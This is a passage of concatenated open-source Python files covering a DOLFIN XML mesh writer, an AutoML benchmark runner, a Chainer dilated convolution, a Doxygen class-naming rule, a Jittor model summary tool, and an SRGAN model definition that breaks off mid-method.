dolfin = ET.Element("dolfin", nsmap={"dolfin": "https://fenicsproject.org/"})
mesh_function = ET.SubElement(
dolfin,
"mesh_function",
type=_numpy_type_to_dolfin_type(cell_data.dtype),
dim=str(dim),
size=str(len(cell_data)),
)
for k, value in enumerate(cell_data):
ET.SubElement(mesh_function, "entity", index=str(k), value=repr(value))
tree = ET.ElementTree(dolfin)
tree.write(filename)
def write(filename, mesh):
logging.warning("DOLFIN XML is a legacy format. Consider using XDMF instead.")
if any("tetra" == c.type for c in mesh.cells):
cell_type = "tetra"
elif any("triangle" == c.type for c in mesh.cells):
cell_type = "triangle"
else:
raise WriteError(
"DOLFIN XML only supports triangles and tetrahedra. "
"Consider using XDMF instead."
)
_write_mesh(filename, mesh.points, cell_type, mesh.cells)
for name, lst in mesh.cell_data.items():
for data in lst:
fname = os.path.splitext(filename)[0]
cell_data_filename = f"{fname}_{name}.xml"
dim = 2 if mesh.points.shape[1] == 2 or all(mesh.points[:, 2] == 0) else 3
_write_cell_data(cell_data_filename, dim, numpy.array(data))
register("dolfin-xml", [".xml"], read, {"dolfin-xml": write})
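# Example round trip through the functions registered above (a sketch; the
# file names "mesh.xml" and "out.xml" are assumptions made for illustration):
#
#   mesh = read("mesh.xml")      # also picks up sibling mesh_<name>.xml cell data
#   write("out.xml", mesh)       # writes the mesh plus out_<name>.xml cell-data files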
|
the-stack_0_3822 | import argparse
import logging
import os
import sys
# prevent asap other modules from defining the root logger using basicConfig
import automl.logger
import automl
from automl.utils import Namespace as ns, config_load, datetime_iso, str2bool
from automl import log
parser = argparse.ArgumentParser()
parser.add_argument('framework', type=str,
help="The framework to evaluate as defined by default in resources/frameworks.yaml.")
parser.add_argument('benchmark', type=str, nargs='?', default='test',
help="The benchmark type to run as defined by default in resources/benchmarks/{benchmark}.yaml "
"or the path to a benchmark description file. Defaults to `%(default)s`.")
parser.add_argument('-m', '--mode', choices=['local', 'docker', 'aws'], default='local',
help="The mode that specifies how/where the benchmark tasks will be running. Defaults to %(default)s.")
parser.add_argument('-t', '--task', metavar='task_id', nargs='*', default=None,
help="The specific task name (as defined in the benchmark file) to run. "
"If not provided, then all tasks from the benchmark will be run.")
parser.add_argument('-f', '--fold', metavar='fold_num', type=int, nargs='*', default=None,
help="If task is provided, the specific fold(s) to run. "
"If fold is not provided, then all folds from the task definition will be run.")
parser.add_argument('-i', '--indir', metavar='input_dir', default=None,
help="Folder where datasets are loaded by default. Defaults to `input_dir` as defined in resources/config.yaml")
parser.add_argument('-o', '--outdir', metavar='output_dir', default=None,
help="Folder where all the outputs should be written. Defaults to `output_dir` as defined in resources/config.yaml")
parser.add_argument('-u', '--userdir', metavar='user_dir', default=None,
help="Folder where all the customizations are stored. Defaults to `user_dir` as defined in resources/config.yaml")
parser.add_argument('-p', '--parallel', metavar='parallel_jobs', type=int, default=1,
help="The number of jobs (i.e. tasks or folds) that can run in parallel. Defaults to %(default)s. "
"Currently supported only in docker and aws mode.")
parser.add_argument('-s', '--setup', choices=['auto', 'skip', 'force', 'only'], default='auto',
help="Framework/platform setup mode. Defaults to %(default)s. "
"•auto: setup is executed only if strictly necessary. •skip: setup is skipped. •force: setup is always executed before the benchmark. •only: only setup is executed (no benchmark).")
parser.add_argument('-k', '--keep-scores', type=str2bool, metavar='true|false', nargs='?', const=True, default=True,
help="Set to true [default] to save/add scores in output directory.")
parser.add_argument('--profiling', nargs='?', const=True, default=False, help=argparse.SUPPRESS)
parser.add_argument('-X', '--extra', default=[], action='append', help=argparse.SUPPRESS)
# group = parser.add_mutually_exclusive_group()
# group.add_argument('--keep-scores', dest='keep_scores', action='store_true',
# help="Set to true [default] to save/add scores in output directory")
# group.add_argument('--no-keep-scores', dest='keep_scores', action='store_false')
# parser.set_defaults(keep_scores=True)
# removing this command line argument for now: by default, we're using the user default region as defined in ~/aws/config
# on top of this, user can now override the aws.region setting in his custom ~/.config/automlbenchmark/config.yaml settings.
# parser.add_argument('-r', '--region', metavar='aws_region', default=None,
# help="The region on which to run the benchmark when using AWS.")
args = parser.parse_args()
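# Example invocation (illustrative only; the framework and benchmark names must
# exist in the local resources/ definitions for this command to work):
#
#   python runbenchmark.py constantpredictor test -m local -o ./results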
script_name = os.path.splitext(os.path.basename(__file__))[0]
log_dir = os.path.join(args.outdir if args.outdir else '.', 'logs')
os.makedirs(log_dir, exist_ok=True)
now_str = datetime_iso(date_sep='', time_sep='')
# now_str = datetime_iso(time=False, no_sep=True)
if args.profiling:
logging.TRACE = logging.INFO
automl.logger.setup(log_file=os.path.join(log_dir, '{script}_{now}.log'.format(script=script_name, now=now_str)),
root_file=os.path.join(log_dir, '{script}_{now}_full.log'.format(script=script_name, now=now_str)),
root_level='DEBUG', console_level='INFO', print_to_log=True)
log.info("Running `%s` on `%s` benchmarks in `%s` mode.", args.framework, args.benchmark, args.mode)
log.debug("Script args: %s.", args)
extras = {t[0]: t[1] if len(t) > 1 else True for t in [x.split('=', 1) for x in args.extra]}
config = config_load("resources/config.yaml")
# allowing config override from user_dir: useful to define custom benchmarks and frameworks for example.
config_user = config_load(os.path.join(args.userdir if args.userdir is not None else config.user_dir, "config.yaml"))
# config listing properties set by command line
config_args = ns.parse(
{'results.save': args.keep_scores},
input_dir=args.indir,
output_dir=args.outdir,
user_dir=args.userdir,
run_mode=args.mode,
script=os.path.basename(__file__),
) + ns.parse(extras)
config_args = ns({k: v for k, v in config_args if v is not None})
log.debug("Config args: %s.", config_args)
# merging all configuration files
automl.resources.from_configs(config, config_user, config_args)
try:
if args.mode == 'local':
bench = automl.Benchmark(args.framework, args.benchmark, parallel_jobs=args.parallel)
elif args.mode == 'docker':
bench = automl.DockerBenchmark(args.framework, args.benchmark, parallel_jobs=args.parallel)
elif args.mode == 'aws':
bench = automl.AWSBenchmark(args.framework, args.benchmark, parallel_jobs=args.parallel)
# bench = automl.AWSBenchmark(args.framework, args.benchmark, parallel_jobs=args.parallel, region=args.region)
# elif args.mode == "aws-remote":
# bench = automl.AWSRemoteBenchmark(args.framework, args.benchmark, parallel_jobs=args.parallel, region=args.region)
else:
raise ValueError("`mode` must be one of 'aws', 'docker' or 'local'.")
if args.setup == 'only':
log.warning("Setting up %s environment only for %s, no benchmark will be run.", args.mode, args.framework)
if not args.keep_scores and args.mode != 'local':
log.warning("`keep_scores` parameter is currently ignored in %s mode, scores are always saved in this mode.", args.mode)
bench.setup(automl.Benchmark.SetupMode[args.setup])
if args.setup != 'only':
res = bench.run(args.task, args.fold)
except ValueError as e:
log.error('\nERROR:\n%s', e)
if extras.get('verbose') is True:
log.exception(e)
sys.exit(1)
|
the-stack_0_3824 | import numpy
from six import moves
import chainer
from chainer import cuda
from chainer import function
from chainer.utils import conv
from chainer.utils import type_check
from chainer import variable
if cuda.cudnn_enabled:
cudnn = cuda.cudnn
libcudnn = cuda.cudnn.cudnn
_fwd_pref = libcudnn.CUDNN_CONVOLUTION_FWD_SPECIFY_WORKSPACE_LIMIT
_bwd_filter_pref = \
libcudnn.CUDNN_CONVOLUTION_BWD_FILTER_SPECIFY_WORKSPACE_LIMIT
_bwd_data_pref = \
libcudnn.CUDNN_CONVOLUTION_BWD_DATA_SPECIFY_WORKSPACE_LIMIT
def _pair(x):
if hasattr(x, '__getitem__'):
return x
return x, x
class DilatedConvolution2DFunction(function.Function):
def __init__(self, stride=1, pad=0, dilate=1, cover_all=False,
requires_x_grad=True):
self.sy, self.sx = _pair(stride)
self.ph, self.pw = _pair(pad)
self.dy, self.dx = _pair(dilate)
self.cover_all = cover_all
self.requires_x_grad = requires_x_grad
def check_type_forward(self, in_types):
n_in = in_types.size()
type_check.expect(2 <= n_in, n_in <= 3)
x_type = in_types[0]
w_type = in_types[1]
type_check.expect(
x_type.dtype.kind == 'f',
w_type.dtype.kind == 'f',
x_type.ndim == 4,
w_type.ndim == 4,
x_type.shape[1] == w_type.shape[1],
)
if type_check.eval(n_in) == 3:
b_type = in_types[2]
type_check.expect(
b_type.dtype == x_type.dtype,
b_type.ndim == 1,
b_type.shape[0] == w_type.shape[0],
)
def forward_cpu(self, inputs):
x, W = inputs[:2]
b = inputs[2] if len(inputs) == 3 else None
if not all([isinstance(i, numpy.ndarray) for i in inputs]):
if b is not None:
raise ValueError('numpy and cupy must not be used together\n'
'type(W): {0}, type(x): {1}, type(b): {2}'
.format(type(W), type(x), type(b)))
else:
raise ValueError('numpy and cupy must not be used together\n'
'type(W): {0}, type(x): {1}'
.format(type(W), type(x)))
kh, kw = W.shape[2:]
self.col = conv.im2col_cpu(
x, kh, kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all, dy=self.dy, dx=self.dx)
y = numpy.tensordot(
self.col, W, ((1, 2, 3), (1, 2, 3))).astype(x.dtype, copy=False)
if b is not None:
y += b
return numpy.rollaxis(y, 3, 1),
def forward_gpu(self, inputs):
x, W = inputs[:2]
b = inputs[2] if len(inputs) == 3 else None
if not all([isinstance(i, cuda.ndarray) for i in inputs]):
if b is not None:
raise ValueError('numpy and cupy must not be used together\n'
'type(W): {0}, type(x): {1}, type(b): {2}'
.format(type(W), type(x), type(b)))
else:
raise ValueError('numpy and cupy must not be used together\n'
'type(W): {0}, type(x): {1}'
.format(type(W), type(x)))
out_c, _, kh, kw = W.shape
n, c, h, w = x.shape
dkh, dkw = kh + (kh - 1) * (self.dy - 1), kw + (kw - 1) * (self.dx - 1)
out_h = conv.get_conv_outsize(h, kh, self.sy, self.ph,
cover_all=self.cover_all, d=self.dy)
out_w = conv.get_conv_outsize(w, kw, self.sx, self.pw,
cover_all=self.cover_all, d=self.dx)
y = cuda.cupy.zeros((n, out_c, out_h, out_w), dtype=x.dtype)
if (not self.cover_all and chainer.should_use_cudnn('>=auto') and
x.dtype == W.dtype):
pad_x = cuda.cupy.zeros((n, c, h + 2 * self.ph, w + 2 * self.pw),
dtype=x.dtype)
pad_x[:, :, self.ph:self.ph + h, self.pw:self.pw + w] = x
out_h_s1 = h + 2 * self.ph - dkh + 1
out_w_s1 = w + 2 * self.pw - dkw + 1
for j in moves.range(kh):
for i in moves.range(kw):
xji = cuda.cupy.ascontiguousarray(
pad_x[:, :,
j * self.dy:j * self.dy + out_h_s1,
i * self.dx:i * self.dx + out_w_s1])
Wji = cuda.cupy.ascontiguousarray(
W[:, :, j:j + 1, i:i + 1])
if i == 0 and j == 0:
handle = cudnn.get_handle()
xji_desc = cudnn.create_tensor_descriptor(xji)
y_desc = cudnn.create_tensor_descriptor(y)
self.filter_desc = cudnn.create_filter_descriptor(Wji)
self.conv_desc = cudnn.create_convolution_descriptor(
(0, 0), (self.sy, self.sx), xji.dtype)
workspace_size = cuda.get_max_workspace_size()
workspace = cuda.cupy.empty(
(workspace_size,), dtype='b')
algo = libcudnn.getConvolutionForwardAlgorithm(
handle, xji_desc.value, self.filter_desc.value,
self.conv_desc.value, y_desc.value, _fwd_pref,
workspace_size)
oz_dtype = 'd' if x.dtype == 'd' else 'f'
one = numpy.array(1, dtype=oz_dtype).ctypes
libcudnn.convolutionForward(
handle, one.data, xji_desc.value, xji.data.ptr,
self.filter_desc.value, Wji.data.ptr,
self.conv_desc.value, algo, workspace.data.ptr,
workspace_size, one.data, y_desc.value, y.data.ptr)
if b is not None:
b = cuda.cupy.ascontiguousarray(b)
self.bias_desc = cudnn.create_tensor_descriptor(
b[None, :, None, None])
cudnn.add_tensor(
handle, one.data, self.bias_desc.value, b.data.ptr,
one.data, y_desc.value, y.data.ptr)
else:
# Implementation using im2col
self.col = conv.im2col_gpu(
x, kh, kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all, dy=self.dy, dx=self.dx)
y = cuda.cupy.tensordot(
self.col, W, ((1, 2, 3), (1, 2, 3))).astype(x.dtype,
copy=False)
# TODO(beam2d): Support unshared bias
if b is not None:
y += b
y = cuda.cupy.rollaxis(y, 3, 1)
return y,
def backward_cpu(self, inputs, grad_outputs):
x, W = inputs[:2]
b = inputs[2] if len(inputs) == 3 else None
gy = grad_outputs[0]
h, w = x.shape[2:]
gW = numpy.tensordot(
gy, self.col, ((0, 2, 3), (0, 4, 5))).astype(W.dtype, copy=False)
if not self.requires_x_grad:
gx = None
else:
gcol = numpy.tensordot(W, gy, (0, 1)).astype(x.dtype, copy=False)
gcol = numpy.rollaxis(gcol, 3)
gx = conv.col2im_cpu(gcol, self.sy, self.sx, self.ph, self.pw,
h, w, dy=self.dy, dx=self.dx)
if b is None:
return gx, gW
else:
gb = gy.sum(axis=(0, 2, 3))
return gx, gW, gb
def backward_gpu(self, inputs, grad_outputs):
x, W = inputs[:2]
b = inputs[2] if len(inputs) == 3 else None
gy = grad_outputs[0]
_, out_c, out_h, out_w = gy.shape
n, c, h, w = x.shape
kh, kw = W.shape[2:]
dkh, dkw = kh + (kh - 1) * (self.dy - 1), kw + (kw - 1) * (self.dx - 1)
gW = cuda.cupy.empty_like(W)
if (not self.cover_all and chainer.should_use_cudnn('>=auto') and
x.dtype == W.dtype):
pad_x = cuda.cupy.zeros(
(n, c, h + 2 * self.ph, w + 2 * self.pw), dtype=x.dtype)
pad_x[:, :, self.ph:self.ph + h, self.pw:self.pw + w] = x
out_h_s1 = h + 2 * self.ph - dkh + 1
out_w_s1 = w + 2 * self.pw - dkw + 1
out_sh = out_h + (out_h - 1) * (self.sy - 1)
out_sw = out_w + (out_w - 1) * (self.sx - 1)
            gy_ph = (h + dkh - out_sh - 1) // 2
            gy_pw = (w + dkw - out_sw - 1) // 2
pad_gy = cuda.cupy.zeros(
(n, out_c, h + dkh - 1, w + dkw - 1), dtype=x.dtype)
pad_gy[:, :,
gy_ph:gy_ph + out_sh:self.sy,
gy_pw:gy_pw + out_sw:self.sx] = gy
gx = None
for j in moves.range(kh):
for i in moves.range(kw):
xji = cuda.cupy.ascontiguousarray(
pad_x[:, :,
j * self.dy:j * self.dy + out_h_s1,
i * self.dx:i * self.dx + out_w_s1])
gyji = cuda.cupy.ascontiguousarray(
pad_gy[:, :,
j * self.dy:j * self.dy + h,
i * self.dx:i * self.dx + w])
Wji = cuda.cupy.ascontiguousarray(
W[:, :, -1::-1, -1::-1][:, :, j:j + 1, i:i + 1])
if i == 0 and j == 0:
x = cuda.cupy.ascontiguousarray(x)
gy = cuda.cupy.ascontiguousarray(gy)
handle = cudnn.get_handle()
x_desc = cudnn.create_tensor_descriptor(x)
xji_desc = cudnn.create_tensor_descriptor(xji)
gy_desc = cudnn.create_tensor_descriptor(gy)
gyji_desc = cudnn.create_tensor_descriptor(gyji)
conv_desc_data = cudnn.create_convolution_descriptor(
(0, 0), (1, 1), xji.dtype)
oz_dtype = 'd' if x.dtype == 'd' else 'f'
one = numpy.array(1, dtype=oz_dtype).ctypes
zero = numpy.array(0, dtype=oz_dtype).ctypes
if self.requires_x_grad:
gx = cuda.cupy.zeros_like(x)
gWji = cuda.cupy.empty((out_c, c, 1, 1), dtype=W.dtype)
workspace_size = cuda.get_max_workspace_size()
workspace = cuda.cupy.empty(
(workspace_size,), dtype='b')
algo_filter = (
libcudnn.getConvolutionBackwardFilterAlgorithm(
handle, xji_desc.value, gy_desc.value,
self.conv_desc.value,
self.filter_desc.value,
_bwd_filter_pref, workspace_size))
algo_data = (
libcudnn.getConvolutionBackwardDataAlgorithm(
handle, self.filter_desc.value,
gyji_desc.value, conv_desc_data.value,
x_desc.value, _bwd_data_pref,
workspace_size))
libcudnn.convolutionBackwardFilter_v3(
handle, one.data, xji_desc.value, xji.data.ptr,
gy_desc.value, gy.data.ptr, self.conv_desc.value,
algo_filter, workspace.data.ptr, workspace_size,
zero.data, self.filter_desc.value, gWji.data.ptr)
if self.requires_x_grad:
libcudnn.convolutionBackwardData_v3(
handle, one.data, self.filter_desc.value,
Wji.data.ptr, gyji_desc.value,
gyji.data.ptr, conv_desc_data.value,
algo_data, workspace.data.ptr, workspace_size,
one.data, x_desc.value, gx.data.ptr)
gW[:, :, j:j + 1, i:i + 1] = gWji
if b is not None:
gb = cuda.cupy.empty_like(b)
libcudnn.convolutionBackwardBias(
handle, one.data, gy_desc.value, gy.data.ptr,
zero.data, self.bias_desc.value, gb.data.ptr)
else:
gW = cuda.cupy.tensordot(
gy, self.col, ((0, 2, 3), (0, 4, 5))).astype(W.dtype,
copy=False)
if not self.requires_x_grad:
gx = None
else:
gcol = cuda.cupy.tensordot(W, gy, (0, 1)).astype(x.dtype,
copy=False)
gcol = cuda.cupy.rollaxis(gcol, 3)
gx = conv.col2im_gpu(gcol, self.sy, self.sx, self.ph, self.pw,
h, w, dy=self.dy, dx=self.dx)
if b is not None:
gb = gy.sum(axis=(0, 2, 3))
if b is None:
return gx, gW
else:
return gx, gW, gb
def dilated_convolution_2d(x, W, b=None, stride=1, pad=0, dilate=1,
cover_all=False):
"""Two-dimensional dilated convolution function.
This is an implementation of two-dimensional dilated convolution
in ConvNets.
It takes three variables: the input image ``x``, the filter weight ``W``,
and the bias vector ``b``.
Notation: here is a notation for dimensionalities.
- :math:`n` is the batch size.
    - :math:`c_I` and :math:`c_O` are the number of input and output channels,
      respectively.
- :math:`h` and :math:`w` are the height and width of the input image,
respectively.
- :math:`k_H` and :math:`k_W` are the height and width of the filters,
respectively.
Args:
x (~chainer.Variable): Input variable of shape :math:`(n, c_I, h, w)`.
W (~chainer.Variable): Weight variable of shape
:math:`(c_O, c_I, k_H, k_W)`.
b (~chainer.Variable): Bias variable of length :math:`c_O` (optional).
stride (int or pair of ints): Stride of filter applications.
``stride=s`` and ``stride=(s, s)`` are equivalent.
pad (int or pair of ints): Spatial padding width for input arrays.
``pad=p`` and ``pad=(p, p)`` are equivalent.
dilate (int or pair of ints): Dilation factor of filter applications.
``dilate=d`` and ``dilate=(d, d)`` are equivalent.
cover_all (bool): If ``True``, all spatial locations are convoluted
into some output pixels. It may make the output size larger.
Returns:
~chainer.Variable: Output variable.
The two-dimensional dilated convolution function is defined as follows.
Then the ``DilatedConvolution2D`` function computes correlations
between filters and patches of size :math:`(k_H, k_W)` in ``x``.
Patches here are extracted at intervals of the dilation factor.
Note that correlation here is equivalent to the inner product between
expanded vectors.
Patches are extracted at intervals of the dilation factor and at positions
shifted by multiples of ``stride`` from the first position ``-pad`` for
each spatial axis. The right-most (or bottom-most) patches do not run over
the padded spatial size.
Let :math:`(s_Y, s_X)` be the stride of filter application,
:math:`(p_H, p_W)` the spatial padding size, and :math:`(d_Y, d_X)`
the dilation factor of filter application. Then, the output size
:math:`(h_O, w_O)` is determined by the following equations:
.. math::
h_O &= (h + 2p_H - k_H - (k_H - 1) * (d_Y - 1)) / s_Y + 1,\\\\
w_O &= (w + 2p_W - k_W - (k_W - 1) * (d_X - 1)) / s_X + 1.
If the bias vector is given, then it is added to all spatial locations of
the output of convolution.
.. seealso:: :class:`DilatedConvolution2D`
"""
requires_x_grad = isinstance(x, variable.Variable) and x.requires_grad
func = DilatedConvolution2DFunction(stride, pad, dilate, cover_all,
requires_x_grad)
if b is None:
return func(x, W)
else:
return func(x, W, b)
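# Example usage (a minimal sketch; the shapes are illustrative assumptions:
# a 1x3x32x32 input convolved with eight 3x3 filters at dilation 2):
#
#   x = chainer.Variable(numpy.random.rand(1, 3, 32, 32).astype(numpy.float32))
#   W = chainer.Variable(numpy.random.rand(8, 3, 3, 3).astype(numpy.float32))
#   y = dilated_convolution_2d(x, W, stride=1, pad=2, dilate=2)
#   # y.shape == (1, 8, 32, 32) by the output-size equations in the docstring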
|
the-stack_0_3825 | from xml.dom import minidom as xd
import re
from AbstractRule import AbstractRule
class FileNamingRule(AbstractRule):
def __init__(self):
AbstractRule.__init__(self)
self.DictionaryList = []
self.DictionaryBaseClassList = []
def execute(self):
f = open("./Rules/FileNamingRules/" + self.ParameterList[0], 'r')
lines = f.readlines()
for line in lines:
self.DictionaryList.append(line.replace("\n","").replace("\r",""))
fBase = open("./Rules/FileNamingRules/" + self.ParameterList[1], 'r')
linesBase = fBase.readlines()
for lineBase in linesBase:
self.DictionaryBaseClassList.append(lineBase.replace("\n","").replace("\r",""))
self.dom = xd.parse(self.FullPathInputFile)
className = self.dom.getElementsByTagName('compounddef')[0].getElementsByTagName('compoundname')[0].firstChild.nodeValue
if(self.dom.getElementsByTagName('compounddef')[0].getElementsByTagName('basecompoundref') == None \
or len(self.dom.getElementsByTagName('compounddef')[0].getElementsByTagName('basecompoundref')) == 0):
for prefix in self.DictionaryList:
x = re.compile("^"+ prefix +"[A-Z].*")
cname = className
if("::" in className) :
cname = className[className.index("::")+2:]
if(re.match(x, str(cname))):
#print "OK " , cname
return self.MarkedList
#print "***NO without Base *** " , cname
self.MarkedList.append("<item><class>" + str(className) + "</class></item>")
return self.MarkedList
result = False
goodPrefix = ""
for prefix in self.DictionaryList:
x = re.compile("^"+ prefix +"[A-Z].*")
if(re.match(x, str(className))):
result = True
goodPrefix = prefix;
break;
if(result == False):
#print "***NO 1 with base*** " , className
self.MarkedList.append("<item><class>" + str(className) + "</class></item>")
return self.MarkedList
for skipName in self.DictionaryBaseClassList:
if(skipName == str(className)):
return self.MarkedList
baseClassName = self.dom.getElementsByTagName('compounddef')[0].getElementsByTagName('basecompoundref')[0].firstChild.nodeValue
## inheritance rule
x2 = re.compile("^"+ baseClassName +".*") #baseClassName or goodPrefix
if(re.match(x2, str(className))):
##print "OK " , className , baseClassName
return self.MarkedList
##print "***NO 2*** " , className , baseClassName
self.MarkedList.append("<item><class>" + str(className) + "</class></item>")
return self.MarkedList
|
the-stack_0_3826 | '''
torch implementation
https://github.com/sksq96/pytorch-summary/blob/master/torchsummary/torchsummary.py
'''
import numpy as np
import jittor as jt
from jittor import nn
from jittor import init
from collections import OrderedDict
device_list = ['cpu', 'cuda']
def summary(model, input_size, batch_size=-1, device='cpu', dtypes=None):
assert(device in device_list)
result, params_info = summary_string(
model, input_size, batch_size, device, dtypes)
print(result)
return params_info
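# Example usage (a sketch; the two-layer model below is an assumption made up
# for illustration, not part of this module):
#
#   model = nn.Sequential(nn.Linear(784, 128), nn.ReLU(), nn.Linear(128, 10))
#   summary(model, input_size=(784,), device='cpu')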
def summary_string(model, input_size, batch_size=-1, device='cpu', dtypes=None):
assert(device in device_list)
if device == 'cuda':
jt.flags.use_cuda = 1
else:
jt.flags.use_cuda = 0
if dtypes == None:
dtypes = [jt.float]*len(input_size)
summary_str = ''
def register_hook(module):
def hook(module, input, output):
class_name = str(module.__class__).split(".")[-1].split("'")[0]
module_idx = len(summary)
m_key = "%s-%i" % (class_name, module_idx + 1)
summary[m_key] = OrderedDict()
summary[m_key]["input_shape"] = list(input[0].size())
summary[m_key]["input_shape"][0] = batch_size
if isinstance(output, (list, tuple)):
summary[m_key]["output_shape"] = [
[-1] + list(o.size())[1:] for o in output
]
else:
summary[m_key]["output_shape"] = list(output.size())
summary[m_key]["output_shape"][0] = batch_size
params = 0
if hasattr(module, "weight") and hasattr(module.weight, "size"):
params += np.prod(np.array(list(module.weight.size()), dtype = np.int64))
summary[m_key]["trainable"] = module.weight.requires_grad
if hasattr(module, "bias") and hasattr(module.bias, "size"):
params += np.prod(np.array(list(module.bias.size()), dtype = np.int64))
summary[m_key]["nb_params"] = params
if (
not isinstance(module, nn.Sequential)
and not isinstance(module, nn.ModuleList)
):
hooks.append(module.register_forward_hook(hook))
# multiple inputs to the network
if isinstance(input_size, tuple):
input_size = [input_size]
# batch_size of 2 for batchnorm
x = [jt.rand(2, *in_size).float()
for in_size in input_size]
# create properties
summary = OrderedDict()
hooks = []
# register hook
model.apply(register_hook)
# make a forward pass
# print(x.shape)
model(*x)
# remove these hooks
for h in hooks:
if h:
h.remove()
summary_str += "----------------------------------------------------------------" + "\n"
line_new = "{:>20} {:>25} {:>15}".format(
"Layer (type)", "Output Shape", "Param #")
summary_str += line_new + "\n"
summary_str += "================================================================" + "\n"
total_params = 0
total_output = 0
trainable_params = 0
for layer in summary:
# input_shape, output_shape, trainable, nb_params
line_new = "{:>20} {:>25} {:>15}".format(
layer,
str(summary[layer]["output_shape"]),
"{0:,}".format(summary[layer]["nb_params"]),
)
total_params += summary[layer]["nb_params"]
total_output += np.prod(summary[layer]["output_shape"])
if "trainable" in summary[layer]:
if summary[layer]["trainable"] == True:
trainable_params += summary[layer]["nb_params"]
summary_str += line_new + "\n"
# assume 4 bytes/number (float on cuda).
total_input_size = abs(np.prod(sum(input_size, ()))
* batch_size * 4. / (1024 ** 2.))
total_output_size = abs(2. * total_output * 4. /
(1024 ** 2.)) # x2 for gradients
total_params_size = abs(total_params * 4. / (1024 ** 2.))
total_size = total_params_size + total_output_size + total_input_size
summary_str += "================================================================" + "\n"
summary_str += "Total params: {0:,}".format(total_params) + "\n"
summary_str += "Trainable params: {0:,}".format(trainable_params) + "\n"
summary_str += "Non-trainable params: {0:,}".format(total_params -
trainable_params) + "\n"
summary_str += "----------------------------------------------------------------" + "\n"
summary_str += "Input size (MB): %0.2f" % total_input_size + "\n"
summary_str += "Forward/backward pass size (MB): %0.2f" % total_output_size + "\n"
summary_str += "Params size (MB): %0.2f" % total_params_size + "\n"
summary_str += "Estimated Total Size (MB): %0.2f" % total_size + "\n"
summary_str += "----------------------------------------------------------------" + "\n"
# return summary
return summary_str, (total_params, trainable_params) |
the-stack_0_3827 | # Copyright 2022 Dakewe Biotech Corporation. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import torch
from torch import nn
from torch.nn import functional as F
from torchvision import models
from torchvision import transforms
from torchvision.models.feature_extraction import create_feature_extractor
__all__ = [
"ResidualConvBlock",
"Discriminator", "Generator",
"ContentLoss"
]
class ResidualConvBlock(nn.Module):
"""Implements residual conv function.
Args:
channels (int): Number of channels in the input image.
"""
def __init__(self, channels: int) -> None:
super(ResidualConvBlock, self).__init__()
self.rcb = nn.Sequential(
nn.Conv2d(channels, channels, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(channels),
nn.PReLU(),
nn.Conv2d(channels, channels, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(channels),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
identity = x
out = self.rcb(x)
out = torch.add(out, identity)
return out
class UpsampleBlock(nn.Module):
def __init__(self, channels: int) -> None:
super(UpsampleBlock, self).__init__()
self.upsample_block = nn.Sequential(
nn.Conv2d(channels, channels * 4, (3, 3), (1, 1), (1, 1)),
nn.PixelShuffle(2),
nn.PReLU(),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.upsample_block(x)
return out
class Discriminator(nn.Module):
def __init__(self) -> None:
super(Discriminator, self).__init__()
self.features = nn.Sequential(
# input size. (3) x 96 x 96
nn.Conv2d(3, 64, (3, 3), (1, 1), (1, 1), bias=True),
nn.LeakyReLU(0.2, True),
# state size. (64) x 48 x 48
nn.Conv2d(64, 64, (3, 3), (2, 2), (1, 1), bias=False),
nn.BatchNorm2d(64),
nn.LeakyReLU(0.2, True),
nn.Conv2d(64, 128, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2, True),
# state size. (128) x 24 x 24
nn.Conv2d(128, 128, (3, 3), (2, 2), (1, 1), bias=False),
nn.BatchNorm2d(128),
nn.LeakyReLU(0.2, True),
nn.Conv2d(128, 256, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2, True),
# state size. (256) x 12 x 12
nn.Conv2d(256, 256, (3, 3), (2, 2), (1, 1), bias=False),
nn.BatchNorm2d(256),
nn.LeakyReLU(0.2, True),
nn.Conv2d(256, 512, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.2, True),
# state size. (512) x 6 x 6
nn.Conv2d(512, 512, (3, 3), (2, 2), (1, 1), bias=False),
nn.BatchNorm2d(512),
nn.LeakyReLU(0.2, True),
)
self.classifier = nn.Sequential(
nn.Linear(512 * 6 * 6, 1024),
nn.LeakyReLU(0.2, True),
nn.Linear(1024, 1),
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.features(x)
out = torch.flatten(out, 1)
out = self.classifier(out)
return out
class Generator(nn.Module):
def __init__(self) -> None:
super(Generator, self).__init__()
# First conv layer.
self.conv_block1 = nn.Sequential(
nn.Conv2d(3, 64, (9, 9), (1, 1), (4, 4)),
nn.PReLU(),
)
# Features trunk blocks.
trunk = []
for _ in range(16):
trunk.append(ResidualConvBlock(64))
self.trunk = nn.Sequential(*trunk)
# Second conv layer.
self.conv_block2 = nn.Sequential(
nn.Conv2d(64, 64, (3, 3), (1, 1), (1, 1), bias=False),
nn.BatchNorm2d(64),
)
# Upscale block
upsampling = []
for _ in range(2):
upsampling.append(UpsampleBlock(64))
self.upsampling = nn.Sequential(*upsampling)
# Output layer.
self.conv_block3 = nn.Conv2d(64, 3, (9, 9), (1, 1), (4, 4))
# Initialize neural network weights
self._initialize_weights()
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self._forward_impl(x)
# Support torch.script function
def _forward_impl(self, x: torch.Tensor) -> torch.Tensor:
out1 = self.conv_block1(x)
out = self.trunk(out1)
out2 = self.conv_block2(out)
out = torch.add(out1, out2)
out = self.upsampling(out)
out = self.conv_block3(out)
out = torch.clamp_(out, 0.0, 1.0)
return out
def _initialize_weights(self) -> None:
for module in self.modules():
if isinstance(module, nn.Conv2d):
nn.init.kaiming_normal_(module.weight)
if module.bias is not None:
nn.init.constant_(module.bias, 0)
elif isinstance(module, nn.BatchNorm2d):
